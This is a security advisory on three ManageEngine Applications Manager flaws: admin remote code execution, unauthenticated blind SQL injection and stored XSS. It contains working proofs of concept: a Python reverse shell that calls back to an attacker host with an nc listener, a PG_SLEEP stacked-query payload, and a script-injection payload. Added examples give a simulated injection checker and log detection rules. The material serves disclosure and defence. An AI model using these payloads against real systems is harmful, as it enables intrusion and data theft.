Trustwave SpiderLabs Security Advisory TWSL2017-015:
Multiple Vulnerabilities in ManageEngine Applications Manager

Published: 08/09/2017
Version: 1.0

Vendor: ManageEngine (https://www.manageengine.com/)
Product: Applications Manager
Version Affected: v13.1 (Build Number 13100)

Product Description:
Applications Manager is an integrated platform used to monitor an entire application ecosystem - end user, applications, and underlying infrastructure components such as application servers, databases, big data stores, middleware & messaging components, web servers, web services, ERP packages, virtual systems and cloud resources.

Finding 1: Remote Code Execution
Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs
CVE: CVE-2017-11740

DESCRIPTION:
An administrative user can upload arbitrary files or binaries and configure them to be executed when an alarm occurs ("Execute Program" actions). An attacker with administrative access can abuse this functionality by uploading a malicious script and having the server hosting Applications Manager execute it. The script runs with the privileges of the Applications Manager process (in the PoC below, the unprivileged account that launched the service).

PROOF OF CONCEPT:
The following PoC shows the process of exploiting the vulnerability. The first HTTP request/response pair shows the upload of a script containing a reverse shell. Once it is uploaded, the admin user creates an "Execute Program" action that points at the script (HTTP request/response #2). Lastly, the admin clicks the "play" button to test the action, which executes the uploaded script; HTTP response #3 shows a successful execution. As seen in the "ATTACKING MACHINE" section, the reverse shell was established.
REQUEST#1:

POST /Upload.do HTTP/1.1
Host: a.b.c.d:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://a.b.c.d:9090/Upload.do?service=AppManager&reqForAdminLayout=true
Cookie: JSESSIONID_APM_9090=29048337F7492D37BCD92E45AF5A41FF; testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJETRjmApTbnPB9srP3yVe0r%2BeYogjCHF2etxCj0z%2FinGzE5xhakURCTv; liveapm-_zldt=947aec4e-12f9-4830-9259-9527f664a2b8; executeProgramActionTable_sortdir=down; executeProgramActionTable_sortcol=1; listMonitorsByorder=false; selectedtabId=hometab; slaAvailabilityTable_sortdir=down; slaAvailabilityTable_sortcol=1; serverSlaTable_sortdir=down; slaDetailsTable_sortdir=down; slaDetailsTable_sortcol=1; selectedtab=7_1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------22081952222609
Content-Length: 534

-----------------------------22081952222609
Content-Disposition: form-data; name="theFile"; filename="shell.sh"
Content-Type: application/octet-stream

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.128",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
-----------------------------22081952222609
Content-Disposition: form-data; name="uploadDir"

./
-----------------------------22081952222609--

RESPONSE#1:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 10 Feb 2017 10:05:32 GMT
Connection: close
Content-Length: 25715

<...SNIPPED...>
The file shell.sh was successfully uploaded to Server.
REQUEST#2:

POST /adminAction.do HTTP/1.1
Host: a.b.c.d:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://a.b.c.d:9090/showTile.do?TileName=.ExecProg&haid=null
Cookie: JSESSIONID_APM_9090=29048337F7492D37BCD92E45AF5A41FF; testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJETRjmApTbnPB9srP3yVe0r%2BeYogjCHF2etxCj0z%2FinGzE5xhakURCTv; liveapm-_zldt=947aec4e-12f9-4830-9259-9527f664a2b8; executeProgramActionTable_sortdir=down; executeProgramActionTable_sortcol=1; listMonitorsByorder=false; selectedtabId=hometab; slaAvailabilityTable_sortdir=down; slaAvailabilityTable_sortcol=1; serverSlaTable_sortdir=down; slaDetailsTable_sortdir=down; slaDetailsTable_sortcol=1; selectedtab=7_1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 378

actions=%2FshowTile.do%3FTileName%3D.ExecProg%26haid%3Dnull&haid=null&method=createExecProgAction&redirectTo=null&id=0&displayname=Shell&serversite=local&choosehost=-2&host=&monitoringmode=TELNET&username=&password=&description=&port=23&prompt=%24&command=shell.sh&execProgExecDir=%2Fhome%2Felvin%2FManageEngine%2FAppManager13%2FAppManager13%2Fworking&abortafter=10&cancel=false

RESPONSE#2:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 10 Feb 2017 10:20:51 GMT
Connection: close
Content-Length: 105954

<...SNIPPED...>
Execute Program action successfully created.
REQUEST#3:

GET /common/executeScript.do?method=testAction&actionID=10000003&haid=null HTTP/1.1
Host: a.b.c.d:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://a.b.c.d:9090/common/executeScript.do?method=testAction&actionID=10000003&haid=null
Cookie: executeProgramActionTable_sortcol=1; executeProgramActionTable_sortdir=down; JSESSIONID_APM_9090=29048337F7492D37BCD92E45AF5A41FF; testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJETRjmApTbnPB9srP3yVe0r%2BeYogjCHF2etxCj0z%2FinGzE5xhakURCTv; liveapm-_zldt=947aec4e-12f9-4830-9259-9527f664a2b8; executeProgramActionTable_sortdir=down; executeProgramActionTable_sortcol=1; listMonitorsByorder=false; selectedtabId=hometab; slaAvailabilityTable_sortdir=down; slaAvailabilityTable_sortcol=1; serverSlaTable_sortdir=down; slaDetailsTable_sortdir=down; slaDetailsTable_sortcol=1; selectedtab=7_1
Connection: close
Upgrade-Insecure-Requests: 1

RESPONSE#3:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Wed, 31 Dec 1969 16:00:00 PST
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 10 Feb 2017 10:23:11 GMT
Connection: close
Content-Length: 105773

<...SNIPPED...>
The action Shell has been successfully executed

ATTACKING MACHINE:

root@kali:~# nc -lvp 8888
listening on [any] 8888 ...
a.b.c.d: inverse host lookup failed: Unknown host
connect to [172.16.1.128] from (UNKNOWN) [a.b.c.d] 34924
$ id
uid=1000(elvin) gid=1000(elvin) groups=1000(elvin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ uname -a
Linux ubuntu-lab 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Finding 2: Blind SQL Injection (Unauthenticated)
Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs
CVE: CVE-2017-11738

DESCRIPTION:
The 'haid' parameter of the '/auditLogAction.do' module is vulnerable to a time-based blind SQL injection attack, and the request does not require authentication. When the payload ";SELECT+PG_SLEEP(5)--" is appended to the vulnerable parameter, the application takes around 10030 milliseconds to respond, compared to 12 milliseconds for the original request. This indicates that the injected SQL statement caused a time delay. The parameter is expected to hold a numeric identifier; the injected value is a stacked query (a second statement after ';') that the back-end database executes. PG_SLEEP and the pg_user catalog used below are PostgreSQL-specific.

PROOF OF CONCEPT:
The following PoC shows that the application delays its response for around 10 seconds if the queried table ("pg_user" in this PoC) exists in the database. If the queried table doesn't exist, there is no delay in the application's response. Note that the request carries no session cookie and the response issues a fresh JSESSIONID, confirming that the endpoint is reachable without authentication.
REQUEST:

GET /auditLogAction.do?method=getAuditDetailsForMonitorGroup&haid=100000446;SELECT+CASE+WHEN+(SELECT+1+FROM+pg_user+LIMIT+1)=1+THEN+PG_SLEEP(5)+ELSE+PG_SLEEP(0)+END; HTTP/1.1
Host: a.b.c.d:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1

RESPONSE:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID_APM_9090=D843ABCA263F484F5EC81E4DCADE5636; Path=/; HttpOnly
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 10 Feb 2017 11:22:48 GMT
Connection: close
Content-Length: 73036

Finding 3: Persistent Cross-site Scripting (XSS)
Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs
CVE: CVE-2017-11739

DESCRIPTION:
An authenticated user with administrative privileges can add a widget to any dashboard. One widget type is a "Utility Widget", whose content is "Custom HTML or Text". Once created, the widget is loaded every time the dashboard it was added to is viewed. An attacker can abuse this functionality by creating a "Utility Widget" whose content is malicious JavaScript, which then executes in the browser of every user who views that dashboard.

PROOF OF CONCEPT:
The first HTTP request/response shows the creation of the "Utility Widget" containing the XSS payload. The second shows the stored payload being returned when the widget is fetched for rendering on the dashboard.
REQUEST#1:

POST /MyPage.do HTTP/1.1
Host: a.b.c.d:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://a.b.c.d:9090/MyPage.do?method=editWidget&pageid=10000001&widgetid=10000007&sid=1486721073346
Cookie: JSESSIONID_APM_9090=29048337F7492D37BCD92E45AF5A41FF; testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJETRjmApTbnPB9srP3yVe0r%2BeYogjCHF2etxCj0z%2FinGzE5xhakURCTv; liveapm-_zldt=947aec4e-12f9-4830-9259-9527f664a2b8; executeProgramActionTable_sortdir=down; executeProgramActionTable_sortcol=1; listMonitorsByorder=false; selectedtabId=hometab; slaAvailabilityTable_sortdir=down; slaAvailabilityTable_sortcol=1; serverSlaTable_sortdir=down; slaDetailsTable_sortdir=down; slaDetailsTable_sortcol=1; selectedtab=1_1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 176

method=saveWidget&widgetid=10000007&pageid=10000001&widgetType=303&selectedMonitors=&displayName=Custom+HTML+or+Text&description=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

RESPONSE#1:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 10 Feb 2017 10:05:32 GMT
Connection: close
Content-Length: 25715

<...SNIPPED...>
Custom Html / Text:

REQUEST#2:

GET /MyPage.do?method=getWidget&pageid=10000001&widgetid=10000007&columns=2&randomnumber=0.5838107195798523& HTTP/1.1
Host: a.b.c.d:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://a.b.c.d:9090/MyPage.do?method=viewDashBoard
Cookie: JSESSIONID_APM_9090=29048337F7492D37BCD92E45AF5A41FF; testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJETRjmApTbnPB9srP3yVe0r%2BeYogjCHF2etxCj0z%2FinGzE5xhakURCTv; liveapm-_zldt=947aec4e-12f9-4830-9259-9527f664a2b8; executeProgramActionTable_sortdir=down; executeProgramActionTable_sortcol=1; listMonitorsByorder=false; selectedtabId=hometab; slaAvailabilityTable_sortdir=down; slaAvailabilityTable_sortcol=1; serverSlaTable_sortdir=down; slaDetailsTable_sortdir=down; slaDetailsTable_sortcol=1; selectedtab=1_1
Connection: close

RESPONSE#2:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Wed, 31 Dec 1969 16:00:00 PST
Content-Type: text/html;charset=UTF-8
Content-Length: 232
Date: Fri, 10 Feb 2017 10:05:32 GMT
Connection: close
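The following is an added example and is not part of the Trustwave advisory. It turns the single timing observation behind Finding 2 into a repeatable check with the controls a practitioner needs before trusting one slow response: a baseline request, a probe whose predicate holds (so PG_SLEEP runs), and a probe whose predicate fails but still parses. The payloads follow the shape of the advisory's own request; the HTTP transport is abstracted as a `send(query_string) -> elapsed seconds` callable, and `make_simulated_send` is a constructed stand-in for a target so the logic runs offline. A real sender would wrap an HTTP GET in a timer and return the elapsed time.

```python
"""Time-based blind SQL injection confirmation check with controls.

Added example, not from the advisory. `make_simulated_send` is a constructed
stand-in for the real target; only the decision logic is the point.
"""
import random
import re
import statistics
from urllib.parse import quote, unquote_plus

PATH = "/auditLogAction.do"
BASE_HAID = "100000446"   # monitor-group id from the advisory's PoC request


def build_query(haid_value: str) -> str:
    """Request target for the vulnerable action; haid is URL-encoded once."""
    return f"{PATH}?method=getAuditDetailsForMonitorGroup&haid={quote(haid_value, safe='')}"


def stacked_sleep(condition: str, seconds: int) -> str:
    """Payload in the shape the advisory uses: the original id, a statement
    separator, then a CASE that sleeps only when `condition` holds."""
    return (f"{BASE_HAID};SELECT CASE WHEN ({condition}) "
            f"THEN PG_SLEEP({seconds}) ELSE PG_SLEEP(0) END;")


def confirm_time_based(send, sleep_seconds: int = 5, rounds: int = 3):
    """Return (confirmed, medians). The three probes are interleaved over
    `rounds` so network drift affects all of them equally:
      baseline - the unmodified request (the advisory's ~12 ms)
      true     - a predicate that holds, so PG_SLEEP(sleep_seconds) runs
      false    - a predicate that fails but still parses (1=2); a delay here
                 means the server is slow, not injectable.
    A non-existent table is a poor 'false' control: PostgreSQL raises an
    error before the CASE is ever evaluated, so it proves nothing about the
    branch that was taken."""
    probes = {
        "baseline": build_query(BASE_HAID),
        "true": build_query(stacked_sleep("(SELECT 1 FROM pg_user LIMIT 1)=1", sleep_seconds)),
        "false": build_query(stacked_sleep("1=2", sleep_seconds)),
    }
    samples = {name: [] for name in probes}
    for _ in range(rounds):
        for name, query in probes.items():
            samples[name].append(send(query))
    medians = {name: statistics.median(values) for name, values in samples.items()}
    delta_true = medians["true"] - medians["baseline"]
    delta_false = medians["false"] - medians["baseline"]
    confirmed = delta_true >= 0.8 * sleep_seconds and delta_false < 0.2 * sleep_seconds
    return confirmed, medians


def make_simulated_send(vulnerable: bool):
    """Constructed stand-in for an HTTP round trip: returns elapsed seconds
    without sleeping or talking to a server. A real sender would time an
    HTTP GET of the query string with time.perf_counter()."""
    rng = random.Random(0)
    # Predicates the fake database "knows" the truth of (hypothetical).
    known = {"(SELECT 1 FROM pg_user LIMIT 1)=1": True, "1=2": False}
    case_re = re.compile(r"CASE WHEN \((.*)\) THEN PG_SLEEP\((\d+)\)")

    def send(query_string: str) -> float:
        haid = unquote_plus(query_string.split("haid=", 1)[1])
        elapsed = 0.012 + rng.uniform(0.0, 0.01)   # ~12 ms, as in the advisory
        m = case_re.search(haid)
        if vulnerable and m and known.get(m.group(1)):
            elapsed += int(m.group(2))             # the stacked statement slept
        return elapsed

    return send


if __name__ == "__main__":
    for label, flag in (("vulnerable build", True), ("fixed build", False)):
        confirmed, medians = confirm_time_based(make_simulated_send(flag))
        print(label, "confirmed" if confirmed else "not confirmed", medians)
```

The thresholds are deliberately loose (80% of the requested sleep for the positive probe, under 20% for the negative one) so that the roughly doubled delay the advisory reports for PG_SLEEP(5) still confirms, while a merely slow server that delays every probe does not.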
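The following is an added example and is not part of the Trustwave advisory. It runs detection logic for the request patterns of Findings 1 and 2 over constructed access-log lines in Tomcat's common log format (`%h %l %u %t "%r" %s %b`); the IP addresses and log lines are made up for the example, with the request lines taken from the PoCs above. Access logs carry only the request line, so the createExecProgAction form post (Finding 1, step 2) and the widget description (Finding 3) are not visible here; catching those requires a proxy or WAF log that records request bodies.

```python
"""Access-log detection for the advisory's request patterns (added example).

Signals implemented:
  - Finding 1: the same client POSTs to /Upload.do and then runs testAction on
    /common/executeScript.do within a time window.
  - Finding 2: a 'haid' parameter that is not an integer id (or the literal
    'null', which the product itself sends).
"""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Constructed sample: one admin session that uploads a script and then tests an
# Execute Program action, one unauthenticated stacked-query probe, and two
# benign requests that must not fire.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2017:10:05:32 +0000] "POST /Upload.do HTTP/1.1" 200 25715
10.0.0.5 - - [10/Feb/2017:10:20:51 +0000] "POST /adminAction.do HTTP/1.1" 200 105954
10.0.0.5 - - [10/Feb/2017:10:23:11 +0000] "GET /common/executeScript.do?method=testAction&actionID=10000003&haid=null HTTP/1.1" 200 105773
10.0.0.9 - - [10/Feb/2017:11:22:48 +0000] "GET /auditLogAction.do?method=getAuditDetailsForMonitorGroup&haid=100000446;SELECT+CASE+WHEN+(SELECT+1+FROM+pg_user+LIMIT+1)=1+THEN+PG_SLEEP(5)+ELSE+PG_SLEEP(0)+END; HTTP/1.1" 200 73036
10.0.0.7 - - [10/Feb/2017:11:30:00 +0000] "GET /auditLogAction.do?method=getAuditDetailsForMonitorGroup&haid=100000446 HTTP/1.1" 200 73036
10.0.0.7 - - [10/Feb/2017:12:00:00 +0000] "GET /common/executeScript.do?method=testAction&actionID=10000001&haid=null HTTP/1.1" 200 105773
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
CHAIN_WINDOW = timedelta(hours=1)   # upload -> testAction gap that still counts as one chain
INTEGER_RE = re.compile(r"-?\d+")


def parse_target(target: str):
    """Split a request target into (path, params). Splits on '&' only: older
    urllib.parse.parse_qs versions also split on ';', which would cut the
    advisory's payload back down to a clean-looking 'haid=100000446'."""
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return path, params


def parse_line(line: str):
    """Parse one common-log-format line; return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, stamp, method, target, status = m.groups()
    path, params = parse_target(target)
    return {"ip": ip, "time": datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": path, "params": params, "status": int(status)}


def analyze(lines):
    """Return a list of findings in log order."""
    findings = []
    last_upload = {}   # client ip -> time of its most recent POST /Upload.do
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        # Finding 1 signal: the same client uploads a file and then presses
        # "play" (testAction) on an Execute Program action. Legitimate admins
        # do this too, so it is a review item, not an automatic block.
        if req["method"] == "POST" and req["path"] == "/Upload.do":
            last_upload[req["ip"]] = req["time"]
        elif (req["path"] == "/common/executeScript.do"
              and req["params"].get("method") == "testAction"
              and req["ip"] in last_upload
              and req["time"] - last_upload[req["ip"]] <= CHAIN_WINDOW):
            findings.append({"finding": "upload-then-execute", "ip": req["ip"],
                             "actionID": req["params"].get("actionID"), "time": req["time"]})
        # Finding 2 signal: haid is an integer id everywhere the advisory shows
        # it (or the literal 'null'); anything else is malformed input.
        haid = req["params"].get("haid")
        if haid is not None and haid != "null" and not INTEGER_RE.fullmatch(haid):
            findings.append({"finding": "malformed-haid", "ip": req["ip"],
                             "path": req["path"], "haid": haid})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG.splitlines()):
        print(finding)
```

The haid rule is applied to every path, not only /auditLogAction.do, because the product sends the parameter to several actions and a non-numeric value is malformed on all of them; if that proves noisy in practice, restrict the check to the audit-log action named in the advisory.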
Remediation Steps:
No official patch is available. To limit exposure, network access to Applications Manager should be restricted to authorized personnel through the use of Access Control Lists and proper network segmentation. Findings 1 and 3 require an administrative account, so administrative access should be limited to the smallest possible set of users; Finding 2 requires no authentication, so network restriction is the only effective interim control for it. Vulnerability scanners and Intrusion Detection Systems (IDS) may detect the presence of the vulnerabilities. Trustwave has added coverage for its IDS/IPS platform.

Revision History:
02/22/2017 - Vulnerability disclosed to vendor
04/12/2017 - Vendor provides expected patch date (Q2)
07/10/2017 - Requested update from vendor (no fix available)
08/09/2017 - Advisory published

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.